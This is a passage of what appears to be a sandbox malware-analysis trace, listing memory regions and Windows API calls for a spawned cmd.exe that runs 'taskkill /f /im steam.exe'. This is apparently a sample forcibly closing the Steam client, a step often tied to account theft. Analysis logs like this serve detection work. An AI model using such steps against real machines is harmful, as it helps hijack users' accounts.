= 0x6cc96fff monitored = 0 entry_point = 0x6cc4b610 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\SysWOW64\\wbemcomn.dll" (normalized: "c:\\windows\\syswow64\\wbemcomn.dll") Region: id = 5114 start_va = 0x740f0000 end_va = 0x7410afff monitored = 0 entry_point = 0x740f9050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 5115 start_va = 0x6cbe0000 end_va = 0x6cc23fff monitored = 0 entry_point = 0x6cbfaaf0 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\SysWOW64\\winsta.dll" (normalized: "c:\\windows\\syswow64\\winsta.dll") Region: id = 5116 start_va = 0x44e0000 end_va = 0x451ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000044e0000" filename = "" Region: id = 5117 start_va = 0x4530000 end_va = 0x456ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004530000" filename = "" Region: id = 5118 start_va = 0x4600000 end_va = 0x460ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004600000" filename = "" Region: id = 5119 start_va = 0x4570000 end_va = 0x45affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004570000" filename = "" Region: id = 5120 start_va = 0x45b0000 end_va = 0x45effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000045b0000" filename = "" Region: id = 5121 start_va = 0x4610000 end_va = 0x464ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004610000" filename = "" Region: id = 5122 start_va = 0x62b0000 end_va = 0x62effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000062b0000" filename = "" Region: id = 5123 start_va = 0x6cbc0000 end_va = 0x6cbd0fff monitored = 0 entry_point = 0x6cbc8fa0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\SysWOW64\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\syswow64\\wbem\\wbemsvc.dll") Region: id = 5124 start_va = 0x6c8e0000 end_va = 0x6c99efff monitored = 0 entry_point = 0x6c911e80 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\SysWOW64\\wbem\\fastprox.dll" (normalized: "c:\\windows\\syswow64\\wbem\\fastprox.dll") Region: id = 5125 start_va = 0x45f0000 end_va = 0x45f5fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000045f0000" filename = "" Thread: id = 362 os_tid = 0x12e8 Thread: id = 363 os_tid = 0xcf8 Thread: id = 364 os_tid = 0xdc8 Thread: id = 365 os_tid = 0x13d8 Thread: id = 366 os_tid = 0x1314 Process: id = "71" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x2df75000" os_pid = "0xc04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x110c" cmd_line = "cmd.exe /c \"taskkill /f /im steam.exe \"" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f72e" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5128 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5129 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5130 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 5131 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 5132 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 5133 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 5134 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 5135 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 5136 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 5137 start_va = 0xf10000 end_va = 0xf61fff monitored = 1 entry_point = 0xf24fd0 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5138 start_va = 0xf70000 end_va = 0x4f6ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000f70000" filename = "" Region: id = 5139 start_va = 0x77720000 end_va = 0x7789afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5140 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 5141 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5142 start_va = 0x7fff0000 end_va = 0x7df87ff9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5143 start_va = 0x7df87ffa0000 end_va = 0x7ff87ff9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df87ffa0000" filename = "" Region: id = 5144 start_va = 0x7ff87ffa0000 end_va = 0x7ff880160fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5145 start_va = 0x7ff880161000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff880161000" filename = "" Region: id = 5146 start_va = 0x5c0000 end_va = 0x5cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 5147 start_va = 0x662d0000 end_va = 0x66349fff monitored = 0 entry_point = 0x662e3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5148 start_va = 0x66350000 end_va = 0x6639ffff monitored = 0 entry_point = 0x66368180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5149 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5150 start_va = 0x663a0000 end_va = 0x663a7fff monitored = 0 entry_point = 0x663a17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5151 start_va = 0x5d0000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5152 start_va = 0x75600000 end_va = 0x756dffff monitored = 0 entry_point = 0x75613980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5153 start_va = 0x75480000 end_va = 0x755fdfff monitored = 0 entry_point = 0x75531b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5154 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5155 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 5156 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5157 start_va = 0x748c0000 end_va = 0x7497dfff monitored = 0 entry_point = 0x748f5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5158 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 5159 start_va = 0x5d0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005d0000" filename = "" Region: id = 5160 start_va = 0x750000 end_va = 0x84ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000750000" filename = "" Region: id = 5161 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 5162 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5163 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5164 start_va = 0x850000 end_va = 0xb86fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 367 os_tid = 0x894 [0218.004] GetModuleHandleA (lpModuleName=0x0) returned 0xf10000 [0218.004] __set_app_type (_Type=0x1) [0218.004] __p__fmode () returned 0x74974d6c [0218.005] __p__commode () returned 0x74975b1c [0218.005] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xf25200) returned 0x0 [0218.005] __getmainargs (in: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0, _DoWildCard=0, _StartInfo=0xf360fc | out: _Argc=0xf360e8, _Argv=0xf360ec, _Env=0xf360f0) returned 0 [0218.005] GetCurrentThreadId () returned 0x894 [0218.005] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x894) returned 0x78 [0218.005] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0218.005] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0218.006] SetThreadUILanguage (LangId=0x0) returned 0x409 [0218.011] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0218.011] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0218.012] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.012] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0218.012] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0218.012] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0218.012] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0218.012] GetConsoleOutputCP () returned 0x1b5 [0218.015] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0218.018] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x154 [0218.018] SetConsoleMode (hConsoleHandle=0x154, dwMode=0x0) returned 0 [0218.018] _get_osfhandle (_FileHandle=1) returned 0x154 [0218.018] GetConsoleMode (in: hConsoleHandle=0x154, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0218.018] _get_osfhandle (_FileHandle=0) returned 0x144 [0218.018] GetConsoleMode (in: hConsoleHandle=0x144, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0218.018] GetEnvironmentStringsW () returned 0x757cb0* [0218.019] GetProcessHeap () returned 0x750000 [0218.019] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa1a) returned 0x7586d8 [0218.019] FreeEnvironmentStringsA (penv="A") returned 1 [0218.019] GetProcessHeap () returned 0x750000 [0218.019] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4) returned 0x750550 [0218.019] GetEnvironmentStringsW () returned 0x757cb0* [0218.019] GetProcessHeap () returned 0x750000 [0218.019] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa1a) returned 0x759100 [0218.019] FreeEnvironmentStringsA (penv="A") returned 1 [0218.019] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0218.019] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.019] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.019] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.019] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.020] RegCloseKey (hKey=0x88) returned 0x0 [0218.020] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0218.020] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0218.020] RegCloseKey (hKey=0x88) returned 0x0 [0218.020] time (in: timer=0x0 | out: timer=0x0) returned 0x62344248 [0218.021] srand (_Seed=0x62344248) [0218.021] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im steam.exe \"" [0218.021] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im steam.exe \"" [0218.021] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0218.021] GetProcessHeap () returned 0x750000 [0218.021] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x210) returned 0x759b28 [0218.021] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x759b30, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0218.021] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0218.021] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0218.021] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.021] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0218.021] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0218.022] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0218.022] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0218.022] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0218.022] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0218.022] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0218.022] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0218.022] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0218.022] GetProcessHeap () returned 0x750000 [0218.023] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x7586d8) returned 1 [0218.023] GetEnvironmentStringsW () returned 0x757cb0* [0218.023] GetProcessHeap () returned 0x750000 [0218.023] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa32) returned 0x75a780 [0218.023] FreeEnvironmentStringsA (penv="A") returned 1 [0218.023] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0218.023] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0218.023] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0218.023] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0218.023] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0218.023] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0218.023] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0218.023] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0218.023] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0218.023] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0218.023] GetProcessHeap () returned 0x750000 [0218.023] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x44) returned 0x7505c8 [0218.023] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0218.024] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0218.024] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0218.024] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x750618 [0218.024] FindClose (in: hFindFile=0x750618 | out: hFindFile=0x750618) returned 1 [0218.024] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x750618 [0218.024] FindClose (in: hFindFile=0x750618 | out: hFindFile=0x750618) returned 1 [0218.024] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0218.024] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x750618 [0218.025] FindClose (in: hFindFile=0x750618 | out: hFindFile=0x750618) returned 1 [0218.025] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0218.025] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0218.025] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0218.025] GetProcessHeap () returned 0x750000 [0218.025] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x75a780) returned 1 [0218.025] GetEnvironmentStringsW () returned 0x757cb0* [0218.025] GetProcessHeap () returned 0x750000 [0218.025] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xa76) returned 0x759d40 [0218.025] FreeEnvironmentStringsA (penv="=") returned 1 [0218.026] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0218.026] GetProcessHeap () returned 0x750000 [0218.026] RtlFreeHeap (HeapHandle=0x750000, Flags=0x0, BaseAddress=0x7505c8) returned 1 [0218.026] GetProcessHeap () returned 0x750000 [0218.026] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x400e) returned 0x75bc40 [0218.027] GetProcessHeap () returned 0x750000 [0218.027] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x46) returned 0x75a7c0 [0218.027] GetProcessHeap () returned 0x750000 [0218.027] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4008) returned 0x75fc58 [0218.027] GetProcessHeap () returned 0x750000 [0218.027] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x4008) returned 0x763c68 [0218.030] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0218.030] GetProcessHeap () returned 0x750000 [0218.030] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x418) returned 0x75a810 [0218.031] SetErrorMode (uMode=0x0) returned 0x8003 [0218.031] SetErrorMode (uMode=0x1) returned 0x0 [0218.031] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x75a818, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0218.031] SetErrorMode (uMode=0x8003) returned 0x1 [0218.031] GetProcessHeap () returned 0x750000 [0218.031] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75a810, Size=0x78) returned 0x75a810 [0218.031] GetProcessHeap () returned 0x750000 [0218.031] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x75a810) returned 0x78 [0218.031] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0218.031] GetProcessHeap () returned 0x750000 [0218.031] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0x62) returned 0x75a890 [0218.031] GetProcessHeap () returned 0x750000 [0218.031] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x8, Size=0xb8) returned 0x75a900 [0218.032] GetProcessHeap () returned 0x750000 [0218.032] RtlReAllocateHeap (Heap=0x750000, Flags=0x0, Ptr=0x75a900, Size=0x62) returned 0x75a900 [0218.032] GetProcessHeap () returned 0x750000 [0218.032] RtlSizeHeap (HeapHandle=0x750000, Flags=0x0, MemoryPointer=0x75a900) returned 0x62 